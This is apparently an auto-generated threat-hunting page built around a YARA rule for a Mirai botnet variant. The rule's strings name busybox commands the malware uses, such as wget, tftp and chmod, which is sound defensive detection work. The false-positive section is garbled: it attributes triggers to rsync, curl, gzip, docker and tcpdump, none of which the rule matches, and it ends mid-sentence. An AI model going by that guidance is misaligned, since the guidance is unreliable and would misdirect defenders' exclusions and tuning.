Generic detection for MiraiX version 7

Hunt Hypothesis

Adversaries using MiraiX version 7 may attempt to scan for vulnerable IoT devices by leveraging known CPE identifiers and weak default credentials. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential botnet command and control communications before they escalate into larger network compromises.

YARA Rule

rule is__Mirai_gen7 {
        meta:
                description = "Generic detection for MiraiX version 7"
                reference = "http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html"
                author = "unixfreaxjp"
                org = "MalwareMustDie"
                date = "2018-01-05"

        strings:
                $st01 = "/bin/busybox rm" fullword nocase wide ascii
                $st02 = "/bin/busybox echo" fullword nocase wide ascii
                $st03 = "/bin/busybox wget" fullword nocase wide ascii
                $st04 = "/bin/busybox tftp" fullword nocase wide ascii
                $st05 = "/bin/busybox cp" fullword nocase wide ascii
                $st06 = "/bin/busybox chmod" fullword nocase wide ascii
                $st07 = "/bin/busybox cat" fullword nocase wide ascii

        condition:
                5 of them
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 7 string patterns in its detection logic.

References

• http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
• Source Rule

False Positive Guidance

• Scenario: Scheduled system backup using rsync
  Description: A legitimate scheduled backup job using rsync may trigger the rule due to similar command patterns.
  Filter/Exclusion: Exclude processes initiated by the root user with rsync in the command line, or filter by the presence of /backup/ in the command path.

• Scenario: Admin task using curl to fetch configuration updates
  Description: System administrators may use curl to fetch configuration updates from internal servers, which could resemble MiraiX traffic.
  Filter/Exclusion: Exclude traffic originating from known admin IPs or processes initiated by users in the sudo group with curl commands targeting internal endpoints.

• Scenario: Logrotate job executing gzip on log files
  Description: The logrotate utility may execute gzip on log files, which could be misinterpreted as MiraiX activity due to the presence of gzip in the command.
  Filter/Exclusion: Filter out processes related to logrotate or exclude commands containing gzip when executed by the root user in a specific directory like /etc/logrotate.d/.

• Scenario: Docker container lifecycle management using docker CLI
  Description: Commands like docker stop or docker rm may be flagged due to the presence of docker in the command line.
  Filter/Exclusion: Exclude processes initiated by the docker user or filter commands that match known Docker management operations.

• Scenario: Network monitoring tool using tcpdump for packet capture
  Description: Tools like tcpdump may be used for legitimate packet capture and analysis, which could trigger the rule due to similar command structures.
  Filter/Exclusion: Exclude processes with tcpdump that are run by the